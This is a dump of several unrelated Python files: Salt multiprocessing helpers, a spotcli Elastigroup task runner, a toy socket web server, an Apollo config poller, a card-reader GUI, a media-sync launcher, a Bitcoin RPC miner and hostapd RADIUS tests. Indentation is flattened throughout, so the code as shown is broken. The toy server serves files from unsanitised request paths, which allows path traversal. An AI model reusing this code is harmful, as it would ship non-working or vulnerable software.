'Salt will either fail to terminate now or leave some '
'zombie processes behind'
)
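# Illustrative usage sketch (not part of the original module): a typical
# caller registers targets with add_process() and then blocks in run(),
# which restarts children that die until stop_restarting() and
# kill_children() are invoked (e.g. from a SIGTERM handler). run() blocks
# when called with the default asynchronous=False.
#
#     def worker():
#         while True:
#             time.sleep(1)
#
#     manager = ProcessManager(name='ExampleManager')
#     manager.add_process(worker)
#     manager.run()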
class MultiprocessingProcess(multiprocessing.Process, NewStyleClassMixIn):
def __new__(cls, *args, **kwargs):
instance = super(MultiprocessingProcess, cls).__new__(cls)
# Patch the run method at runtime because decorating the run method
# with a function with a similar behavior would be ignored once this
        # class's run method is overridden.
instance._original_run = instance.run
instance.run = instance._run
return instance
def __init__(self, *args, **kwargs):
if (salt.utils.platform.is_windows() and
not hasattr(self, '_is_child') and
self.__setstate__.__code__ is
MultiprocessingProcess.__setstate__.__code__):
# On Windows, if a derived class hasn't defined __setstate__, that
# means the 'MultiprocessingProcess' version will be used. For this
# version, save a copy of the args and kwargs to use with its
# __setstate__ and __getstate__.
# We do this so that __init__ will be invoked on Windows in the
# child process so that a register_after_fork() equivalent will
# work on Windows. Note that this will only work if the derived
# class uses the exact same args and kwargs as this class. Hence
# this will also work for 'SignalHandlingMultiprocessingProcess'.
# However, many derived classes take params that they don't pass
# down (eg opts). Those classes need to override __setstate__ and
# __getstate__ themselves.
self._args_for_getstate = copy.copy(args)
self._kwargs_for_getstate = copy.copy(kwargs)
self.log_queue = kwargs.pop('log_queue', None)
if self.log_queue is None:
self.log_queue = salt.log.setup.get_multiprocessing_logging_queue()
else:
# Set the logging queue so that it can be retrieved later with
# salt.log.setup.get_multiprocessing_logging_queue().
salt.log.setup.set_multiprocessing_logging_queue(self.log_queue)
# Call __init__ from 'multiprocessing.Process' only after removing
# 'log_queue' from kwargs.
super(MultiprocessingProcess, self).__init__(*args, **kwargs)
if salt.utils.platform.is_windows():
# On Windows, the multiprocessing.Process object is reinitialized
# in the child process via the constructor. Due to this, methods
# such as ident() and is_alive() won't work properly. So we use
# our own creation '_is_child' for this purpose.
if hasattr(self, '_is_child'):
# On Windows, no need to call register_after_fork().
# register_after_fork() would only work on Windows if called
# from the child process anyway. Since we know this is the
# child process, call __setup_process_logging() directly.
self.__setup_process_logging()
multiprocessing.util.Finalize(
self,
salt.log.setup.shutdown_multiprocessing_logging,
exitpriority=16
)
else:
multiprocessing.util.register_after_fork(
self,
MultiprocessingProcess.__setup_process_logging
)
multiprocessing.util.Finalize(
self,
salt.log.setup.shutdown_multiprocessing_logging,
exitpriority=16
)
# __setstate__ and __getstate__ are only used on Windows.
# We do this so that __init__ will be invoked on Windows in the child
# process so that a register_after_fork() equivalent will work on Windows.
def __setstate__(self, state):
self._is_child = True
args = state['args']
kwargs = state['kwargs']
# This will invoke __init__ of the most derived class.
self.__init__(*args, **kwargs)
def __getstate__(self):
args = self._args_for_getstate
kwargs = self._kwargs_for_getstate
if 'log_queue' not in kwargs:
kwargs['log_queue'] = self.log_queue
# Remove the version of these in the parent process since
# they are no longer needed.
del self._args_for_getstate
del self._kwargs_for_getstate
return {'args': args,
'kwargs': kwargs}
def __setup_process_logging(self):
salt.log.setup.setup_multiprocessing_logging(self.log_queue)
def _run(self):
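        # Installed in place of run() by __new__ so that exceptions escaping the child are logged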
try:
return self._original_run()
except SystemExit:
# These are handled by multiprocessing.Process._bootstrap()
raise
except Exception as exc:
log.error(
'An un-handled exception from the multiprocessing process '
'\'%s\' was caught:\n', self.name, exc_info=True)
# Re-raise the exception. multiprocessing.Process will write it to
# sys.stderr and set the proper exitcode and we have already logged
# it above.
raise
class SignalHandlingMultiprocessingProcess(MultiprocessingProcess):
def __init__(self, *args, **kwargs):
super(SignalHandlingMultiprocessingProcess, self).__init__(*args, **kwargs)
if salt.utils.platform.is_windows():
if hasattr(self, '_is_child'):
# On Windows, no need to call register_after_fork().
# register_after_fork() would only work on Windows if called
# from the child process anyway. Since we know this is the
# child process, call __setup_signals() directly.
self.__setup_signals()
else:
multiprocessing.util.register_after_fork(
self,
SignalHandlingMultiprocessingProcess.__setup_signals
)
def __setup_signals(self):
signal.signal(signal.SIGINT, self._handle_signals)
signal.signal(signal.SIGTERM, self._handle_signals)
def _handle_signals(self, signum, sigframe):
signal.signal(signal.SIGTERM, signal.SIG_IGN)
signal.signal(signal.SIGINT, signal.SIG_IGN)
msg = '{0} received a '.format(self.__class__.__name__)
if signum == signal.SIGINT:
msg += 'SIGINT'
elif signum == signal.SIGTERM:
msg += 'SIGTERM'
msg += '. Exiting'
log.debug(msg)
if HAS_PSUTIL:
process = psutil.Process(self.pid)
if hasattr(process, 'children'):
for child in process.children(recursive=True):
if child.is_running():
child.terminate()
sys.exit(salt.defaults.exitcodes.EX_OK)
def start(self):
with default_signals(signal.SIGINT, signal.SIGTERM):
super(SignalHandlingMultiprocessingProcess, self).start()
@contextlib.contextmanager
def default_signals(*signals):
old_signals = {}
for signum in signals:
try:
old_signals[signum] = signal.getsignal(signum)
signal.signal(signum, signal.SIG_DFL)
except ValueError as exc:
# This happens when a netapi module attempts to run a function
# using wheel_async, because the process trying to register signals
# will not be the main PID.
log.trace(
'Failed to register signal for signum %d: %s',
signum, exc
)
# Do whatever is needed with the reset signals
yield
# Restore signals
for signum in old_signals:
signal.signal(signum, old_signals[signum])
del old_signals
|
tasks.py
|
import sys
import threading
from abc import ABC, abstractmethod
from collections import UserList
from typing import Dict, List, Optional, Union
import attr
import rich.console
from spotcli.providers.spot import SpotProvider
from spotcli.utils.elastigroup import Elastigroup, ElastigroupProcess
console = rich.console.Console(highlight=False)
class Alias(UserList):
def __init__(self, name: str, targets: List[str]):
self.name = name
self.targets = targets
@property
def data(self):
return self.targets
class TargetList(UserList):
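    """Lazily resolves aliases and target names into Elastigroup objects."""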
def __init__(
self,
spot: SpotProvider,
aliases: Dict[str, Alias],
targets: Union[str, List[str]],
):
self.spot = spot
self.aliases = aliases
self.targets = targets
@property
def data(self):
try:
targets = getattr(self, "_targets")
except AttributeError:
def reduce(
array: Union[List[str], Alias, str], result: List[str] = []
) -> List[str]:
"""Flatten a list with arbitrary dimensions."""
if isinstance(array, str):
array = [array]
for item in array:
if isinstance(item, str):
if item in self.aliases:
reduce(self.aliases[item], result)
else:
result.append(item)
else:
reduce(item, result)
return result
targets = Elastigroup.find(self.spot.client(), reduce(self.targets))
setattr(self, "_targets", targets)
        return targets
@attr.s(auto_attribs=True)
class Task(ABC):
kind: str
targets: TargetList
@classmethod
def register(cls, kind):
def decorator(subcls):
kinds = getattr(cls, "kinds", {})
kinds.update({kind: subcls})
setattr(cls, "kinds", kinds)
return subcls
return decorator
    def __new__(cls, kind: str, *args, **kwargs) -> "Task":
        if cls is not Task:
            # object.__new__() accepts no extra arguments; __init__ receives them instead
            return super(Task, cls).__new__(cls)
try:
task = getattr(cls, "kinds", {})[kind]
return super(Task, cls).__new__(task)
except KeyError:
console.print(f"[bold red]ERROR:[/] Invalid action: {kind}")
sys.exit(1)
@abstractmethod
def run(self):
pass
@Task.register("roll")
@attr.s(auto_attribs=True)
class RollTask(Task):
batch: Optional[Union[str, int]] = ""
grace: Optional[Union[str, int]] = ""
def run(self):
def work(target, batch, grace, console):
try:
target.roll(batch, grace)
console.print(
f"Started roll on [bold blue]{target.name}[/] with [bold cyan]"
f"{self.batch if '%' in str(self.batch) else self.batch + ' instances'}[/] batch size"
)
return True
except Exception:
console.print(
f"[bold red]ERROR:[/] Failed to roll [bold]{target.name}[/]"
)
console.print_exception()
return False
threads = []
for target in self.targets:
thread = threading.Thread(
None,
work,
kwargs=dict(
target=target, batch=self.batch, grace=self.grace, console=console
),
)
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
@Task.register("upscale")
@attr.s(auto_attribs=True)
class UpscaleTask(Task):
amount: Union[int, str]
def run(self):
def work(target, amount, console):
try:
target.scale_up(amount)
console.print(
f"Scaled up [bold blue]{target.name}[/] by [bold cyan]{amount if '%' in str(amount) else amount + ' instances'}[/]"
)
return True
except Exception:
console.print(
f"[bold red]ERROR:[/] Failed to scale up [bold]{target.name}[/]"
)
console.print_exception()
return False
threads = []
for target in self.targets:
thread = threading.Thread(
None,
work,
kwargs=dict(target=target, amount=self.amount, console=console),
)
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
@Task.register("downscale")
@attr.s(auto_attribs=True)
class DownscaleTask(Task):
amount: Union[int, str]
def run(self):
def work(target, amount, console):
try:
target.scale_down(amount)
console.print(
f"Scaled down [bold blue]{target.name}[/] by [bold cyan]{amount if '%' in str(amount) else amount + ' instances'}[/]"
)
return True
except Exception:
console.print(
f"[bold red]ERROR:[/] Failed to scale down [bold blue]{target.name}[/]"
)
console.print_exception()
return False
threads = []
for target in self.targets:
thread = threading.Thread(
None,
work,
kwargs=dict(target=target, amount=self.amount, console=console),
)
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
@Task.register("suspend")
@attr.s(auto_attribs=True)
class SuspendTask(Task):
processes: List[str]
def run(self):
def work(target, process, console):
process = ElastigroupProcess[process]
try:
target.suspend(process)
console.print(
f"Suspended [bold cyan]{process.name}[/] on [bold blue]{target.name}[/]"
)
return True
except Exception:
console.print(
f"[bold red]ERROR:[/] Failed to suspend [bold cyan]{process.name}[/] on [bold blue]{target.name}[/]"
)
console.print_exception()
return False
threads = []
for target in self.targets:
for process in self.processes:
thread = threading.Thread(
None,
work,
kwargs=dict(target=target, process=process, console=console),
)
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
@Task.register("unsuspend")
@attr.s(auto_attribs=True)
class UnsuspendTask(Task):
processes: List[str]
def run(self):
def work(target, process, console):
process = ElastigroupProcess[process]
try:
target.unsuspend(process)
console.print(
f"Unsuspended [bold cyan]{process.name}[/] on [bold blue]{target.name}[/]"
)
return True
except Exception:
console.print(
f"[bold red]ERROR:[/] Failed to unsuspend [bold cyan]{process.name}[/] on [bold blue]{target.name}[/]"
)
console.print_exception()
return False
threads = []
for target in self.targets:
for process in self.processes:
thread = threading.Thread(
None,
work,
kwargs=dict(target=target, process=process, console=console),
)
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
@attr.s(auto_attribs=True)
class Scenario:
name: str
tasks: List[Task]
description: Optional[str] = ""
    def run(self):
        results = []
        for task in self.tasks:
            results.append(task.run())
        return results
|
simple_http_dynamic_server.py
|
#!/usr/bin/python3
# file: multiprocess_web_server.py
# Created by Guang at 19-7-19
# description:
# -*- coding: utf-8 -*-
import multiprocessing
import socket
import re
import time
class WSGIServer(object):
def __init__(self, ip, port):
        # 1. Create the socket
self.listen_server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.listen_server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        # 2. Bind the ip and port
self.local_addr = (ip, port)
self.listen_server.bind(self.local_addr)
        # 3. Switch the socket from active to passive (listening) mode
self.listen_server.listen(128)
def service_client(self, new_socket):
"""为这个客户端返回数据"""
# 1.接收浏览器发送过来的请求, 即HTTP请求
# GET / HTTP/1.1
request = new_socket.recv(1024).decode('utf-8')
        request_lines = request.splitlines()  # When the client closes the connection, recv unblocks and returns an empty string, which yields an empty list here
if not request_lines:
return
file_name = ""
ret = re.match(r'[^/]+(/[^ ]*)', request_lines[0])
if ret:
file_name = ret.group(1)
# print("*" * 50, file_name)
if file_name == "/":
file_name = "/index.html"
        # 2. Send back data in HTTP format
        # Treat resources whose names end in .py as dynamic resources
if not file_name.endswith(".py"):
try:
f = open("./html" + file_name, 'rb')
except Exception as e:
response = "HTTP/1.1 404 NOT FOUND\r\n"
response += "\r\n"
response += "----------file not found --------"
new_socket.send(response.encode("utf-8"))
else:
html_content = f.read()
f.close()
                # 2.1 Prepare the data to send to the browser -- header
response = "HTTP/1.1 200 OK\r\n"
response += "\r\n"
                # 2.2 Prepare the data to send to the browser -- body
                # response += "hahaha"
                # Send the response header to the browser
new_socket.send(response.encode("utf-8"))
                # Send the response body to the browser
new_socket.send(html_content)
else:
            # Load a dynamic resource
print(file_name)
if file_name == "/login.py":
                # 2.1 Prepare the data to send to the browser -- header
header = "HTTP/1.1 200 OK\r\n"
header += "\r\n"
                # 2.2 Prepare the data to send to the browser -- body
body = "welcome xxx login website ....<br> login: %s" % time.ctime()
elif file_name == "/logout.py":
header = "HTTP/1.1 200 OK\r\n"
header += "\r\n"
                # 2.2 Prepare the data to send to the browser -- body
body = "xxx logout website ....<br> logout: %s" % time.ctime()
else:
header = "HTTP/1.1 404 NOT FOUND\r\n"
header += "\r\n"
body = "----------file not found --------"
response = header + body
new_socket.send(response.encode("utf-8"))
        # Must close here as well to release the underlying file descriptor
new_socket.close()
def runserver(self):
while True:
            # 4. Wait for a new client connection
new_socket, client_addr = self.listen_server.accept()
            # 5. Serve this client
p = multiprocessing.Process(target=self.service_client, args=(new_socket, ))
p.start()
            # In a process-based concurrent server the parent must also call new_socket.close() here; reason: the child process holds its own copy of the file descriptor (fd)
new_socket.close()
        # Close the listening socket
self.listen_server.close()
if __name__ == '__main__':
ip = ''
port = 8888
wsgi_server = WSGIServer(ip, port)
wsgi_server.runserver()
|
apollo.py
|
import json
import logging
import threading
import time
from http import HTTPStatus
from typing import Dict
import requests
from configalchemy import BaseConfig, ConfigType
time_counter = time.time
class ConfigException(Exception):
...
logger = logging.getLogger(__name__)
class ApolloBaseConfig(BaseConfig):
CONFIGALCHEMY_ENABLE_FUNCTION = True
APOLLO_USING_CACHE = False
APOLLO_SERVER_URL = ""
APOLLO_APP_ID = ""
APOLLO_CLUSTER = "default"
APOLLO_NAMESPACE = "application"
APOLLO_EXTRA_NAMESPACE = ""
APOLLO_EXTRA_NAMESPACE_PRIORITY = 9
APOLLO_LONG_POLL_TIMEOUT = 80
def __init__(self):
self.apollo_notification_map: Dict[str, ConfigType] = {}
super().__init__()
def start_long_poll(self):
logger.info("start long poll")
thread = threading.Thread(target=self.long_poll)
thread.daemon = True
thread.start()
return thread
def _access_config_by_namespace(self, namespace: str) -> ConfigType:
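        # "configfiles" serves Apollo's locally cached config; "configs" queries the config service directly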
route = "configs"
if self.APOLLO_USING_CACHE:
route = "configfiles"
url = (
f"{self.APOLLO_SERVER_URL}/{route}/{self.APOLLO_APP_ID}/"
f"{self.APOLLO_CLUSTER}/{namespace}"
)
logger.info(f"Access apollo server url: {url}")
response = requests.get(url)
if response.ok:
data = response.json()
self.apollo_notification_map.setdefault(data["namespaceName"], {"id": -1})
self.apollo_notification_map[data["namespaceName"]]["data"] = data.get(
"configurations", {}
)
logger.debug(f"Got from apollo: {data}")
return data.get("configurations", {})
else:
raise ConfigException(f"loading config failed: {url}")
def configuration_function(self) -> ConfigType:
self.from_mapping(
self._access_config_by_namespace(self.APOLLO_NAMESPACE),
priority=self.CONFIGALCHEMY_FUNCTION_VALUE_PRIORITY,
)
for namespace in self.APOLLO_EXTRA_NAMESPACE.split(","):
if namespace:
self.from_mapping(
self._access_config_by_namespace(namespace),
priority=self.APOLLO_EXTRA_NAMESPACE_PRIORITY,
)
return {}
def long_poll_from_apollo(self):
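        # Long poll Apollo's notifications/v2 endpoint: 304 means no change, 200 lists the changed namespaces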
url = f"{self.APOLLO_SERVER_URL}/notifications/v2/"
notifications = []
for key, value in self.apollo_notification_map.items():
notifications.append({"namespaceName": key, "notificationId": value["id"]})
r = requests.get(
url=url,
params={
"appId": self.APOLLO_APP_ID,
"cluster": self.APOLLO_CLUSTER,
"notifications": json.dumps(notifications, ensure_ascii=False),
},
timeout=self.APOLLO_LONG_POLL_TIMEOUT,
)
if r.status_code == HTTPStatus.NOT_MODIFIED:
logger.info("Apollo No change, loop...")
elif r.status_code == HTTPStatus.OK:
data = r.json()
for entry in data:
logger.info(
"%s has changes: notificationId=%d"
% (entry["namespaceName"], entry["notificationId"])
)
namespace = entry["namespaceName"]
if namespace == self.APOLLO_NAMESPACE:
self.from_mapping(
self._access_config_by_namespace(namespace),
priority=self.CONFIGALCHEMY_FUNCTION_VALUE_PRIORITY,
)
else:
self.from_mapping(
self._access_config_by_namespace(namespace),
priority=self.APOLLO_EXTRA_NAMESPACE_PRIORITY,
)
self.apollo_notification_map[entry["namespaceName"]]["id"] = entry[
"notificationId"
]
else: # pragma: no cover
raise ConfigException(f"{url} : unexpected status {r.status_code}")
def long_poll(self):
while True:
try:
logger.debug("start apollo configuration long poll")
self.long_poll_from_apollo()
            except (ConfigException, requests.RequestException):
                # Transient network errors and long-poll timeouts should not kill the polling thread
                time.sleep(5)
|
gui.py
|
#!/usr/bin/env python3
import tkinter
import threading
import os
from sit_idcardlib_py import Reader
FILE_NAME = "ids.txt"
class App(tkinter.Frame):
def __init__(self, master=None):
super().__init__(master)
self.master = master
self.pack()
self.create_widgets()
def create_widgets(self):
self.id_label = tkinter.Label(
self,
text="Not detected",
padx=5,
pady=10,
font=("", 36)
)
self.id_label.pack(side=tkinter.TOP)
root = tkinter.Tk()
app = App(master=root)
def callback(card):
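    # Invoked by the card reader for each detected card: show the ID and append unseen IDs to FILE_NAME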
global app
global reader
try:
app.id_label["text"] = card.id
found = False
if os.path.isfile(FILE_NAME):
with open(FILE_NAME) as f:
while True:
student_id = f.readline()
if not student_id:
break
student_id = student_id.strip()
if student_id == card.id:
found = True
break
if not found:
with open(FILE_NAME, "a") as f:
f.write("{}\n".format(card.id))
except Exception as e:
print(e)
reader = Reader(callback)
def thread():
global reader
while True:
try:
reader.read()
except Exception as e:
print(e)
# Run the reader loop as a daemon so it does not keep the process alive after the GUI exits
threading.Thread(target=thread, daemon=True).start()
app.mainloop()
|
main.py
|
import argparse
import sys
import signal
import time
import os
import subprocess
from multiprocessing import Process, Pool
from multiprocessing.managers import BaseManager
from itertools import product
from termcolor import colored
from server_comm import ServerConnection, set_vars
from vlc_comm import player
from util import get_videos, path2title, Animation
from audio_extract import extract
TO_CLEAR = ["cache", "invite_link.txt", "invite_link.svg"]
def parse():
parser = argparse.ArgumentParser(
description="Route audio of a video file through a local server."
)
group = parser.add_mutually_exclusive_group()
parser.add_argument(
"-f",
"--file",
required=True,
dest="f",
help="Path to video files or directory containing video files",
type=str,
action="append",
)
parser.add_argument(
"-s", "--sub", dest="sub", help="Load subtitle File", type=str, action="store"
)
parser.add_argument(
"--qr", help="Show qr code with the link", dest="qr", action="store_true"
)
parser.add_argument(
"--control",
help="only host can control play/pause signals",
dest="onlyHost",
action="store_true",
)
parser.add_argument(
"--force-rebuild",
help="Force rebuild of the local server",
dest="rebuild",
action="store_true",
)
parser.add_argument(
"--audio-quality",
dest="q",
help="Audio quality to sync from",
choices=["low", "medium", "good", "high"],
type=str,
default="medium",
)
group.add_argument(
"--web",
help="Force routing through a web server",
dest="web",
action="store_true",
)
args = parser.parse_args()
videos = []
for i in range(len(args.f)):
args.f[i] = os.path.abspath(args.f[i])
videos.extend(get_videos(args.f[i], TO_CLEAR))
args.f = videos
return args
def convert_async(paths):
    """Convert video files to audio files asynchronously using a pool of processes."""
pool = Pool()
files = []
st = time.perf_counter()
print(f"[{colored('+','green')}] Extraction of audio started ...")
p = pool.starmap_async(extract, product(paths, [args.q]), callback=files.extend)
p.wait()
print(
f"[{colored('+','green')}] Completed extraction of {colored(len(paths),'yellow')} file(s) in {colored(time.perf_counter()-st,'yellow')} seconds"
)
return files
def exitHandler(*args, **kwargs):
os.system("killall node 2> /dev/null")
os.system("killall npm 2> /dev/null")
for file in TO_CLEAR:
if os.path.exists(file):
try:
os.remove(file)
            except OSError:
                pass
sys.exit(0)
def spawn_server():
SERVER_PATH = "../../CommonAudioVideoServer/"
if not os.path.exists(SERVER_PATH):
        print(
            f"[{colored('-','red')}] Invalid Server Path, Try {colored('reinstalling','red')} the package"
        )
sys.exit(-1)
if not os.path.exists(SERVER_PATH + "node_modules"):
print(f"[{colored('+','green')}] Configuring the server ..")
anim = Animation()
subprocess.Popen(
"npm install".split(),
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL,
cwd=os.getcwd() + "/" + SERVER_PATH,
).wait()
anim.complete()
print(f"[{colored('+','green')}] Server configuration complete ..")
if args.rebuild:
print(f"[{colored('+','green')}] Building server ..")
anim = Animation()
subprocess.Popen(
"npm run compile".split(),
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL,
cwd=os.getcwd() + "/" + SERVER_PATH,
).wait()
anim.complete()
print(f"[{colored('+','green')}] Server build successfull ..")
print(f"[{colored('+','green')}] Initializing Server ..")
anim = Animation()
proc = subprocess.Popen(
"npm start".split(),
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
cwd=os.getcwd() + "/" + SERVER_PATH,
)
    for line in iter(proc.stdout.readline, b""):
if b"npm ERR!" in line:
print(colored(line, "red"))
            print(
                f"[{colored('-','red')}] An error has occurred while starting the server\nRestarting the server"
            )
os.system("killall node")
os.system("killall npm")
sys.exit(-1)
if b"Press CTRL-C to stop" in line:
anim.complete()
break
def initialize(videos, server, first=False):
audio = convert_async(videos)
for video in videos:
if args.web:
server.upload(video, video[:-3] + "ogg")
else:
server.addAudioPath(video, video[:-3] + "ogg")
player.enqueue(video)
        if first:
server.create_room()
player.play()
player.pause()
player.seek(0)
server.add_track(video)
if __name__ == "__main__":
signal.signal(signal.SIGINT, exitHandler)
args = parse()
set_vars(args)
if not args.web:
spawn_server()
player.launch(args.sub)
BaseManager.register("ServerConnection", ServerConnection)
manager = BaseManager()
manager.start()
server = manager.ServerConnection()
server.start_listening()
Process(target=player.update, args=(server,)).start()
initialize([args.f[0]], server=server, first=True)
if len(args.f) > 1:
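        # NOTE: .run() executes initialize() synchronously in this process;
        # use .start() if the remaining files should be processed in parallel.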
Process(
target=initialize,
kwargs={"videos": args.f[1:], "server": server, "first": False},
).run()
print("\n" + colored("#" * 70, "green") + "\n")
while True:
time.sleep(1)
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
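		# Splice the byte-reversed nonce back into the getwork data (hex chars 152-159 = bytes 76-79)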
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 4221
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
test_radius.py
|
# RADIUS tests
# Copyright (c) 2013-2016, Jouni Malinen <j@w1.fi>
#
# This software may be distributed under the terms of the BSD license.
# See README for more details.
from remotehost import remote_compatible
import binascii
import hashlib
import hmac
import logging
logger = logging.getLogger()
import os
import select
import struct
import subprocess
import threading
import time
import hostapd
from utils import HwsimSkip, require_under_vm, skip_with_fips, fail_test
from test_ap_hs20 import build_dhcp_ack
from test_ap_ft import ft_params1
def connect(dev, ssid, wait_connect=True):
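    # Test helper: associate to the given SSID with WPA2-Enterprise using EAP-PSK credentials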
dev.connect(ssid, key_mgmt="WPA-EAP", scan_freq="2412",
eap="PSK", identity="psk.user@example.com",
password_hex="0123456789abcdef0123456789abcdef",
wait_connect=wait_connect)
@remote_compatible
def test_radius_auth_unreachable(dev, apdev):
"""RADIUS Authentication server unreachable"""
params = hostapd.wpa2_eap_params(ssid="radius-auth")
params['auth_server_port'] = "18139"
hapd = hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-auth", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"])
if ev is None:
raise Exception("Timeout on EAP start")
logger.info("Checking for RADIUS retries")
time.sleep(4)
mib = hapd.get_mib()
if "radiusAuthClientAccessRequests" not in mib:
raise Exception("Missing MIB fields")
if int(mib["radiusAuthClientAccessRetransmissions"]) < 1:
raise Exception("Missing RADIUS Authentication retransmission")
if int(mib["radiusAuthClientPendingRequests"]) < 1:
raise Exception("Missing pending RADIUS Authentication request")
def test_radius_auth_unreachable2(dev, apdev):
"""RADIUS Authentication server unreachable (2)"""
subprocess.call(['ip', 'ro', 'replace', '192.168.213.17', 'dev', 'lo'])
params = hostapd.wpa2_eap_params(ssid="radius-auth")
params['auth_server_addr'] = "192.168.213.17"
params['auth_server_port'] = "18139"
hapd = hostapd.add_ap(apdev[0], params)
subprocess.call(['ip', 'ro', 'del', '192.168.213.17', 'dev', 'lo'])
connect(dev[0], "radius-auth", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"])
if ev is None:
raise Exception("Timeout on EAP start")
logger.info("Checking for RADIUS retries")
time.sleep(4)
mib = hapd.get_mib()
if "radiusAuthClientAccessRequests" not in mib:
raise Exception("Missing MIB fields")
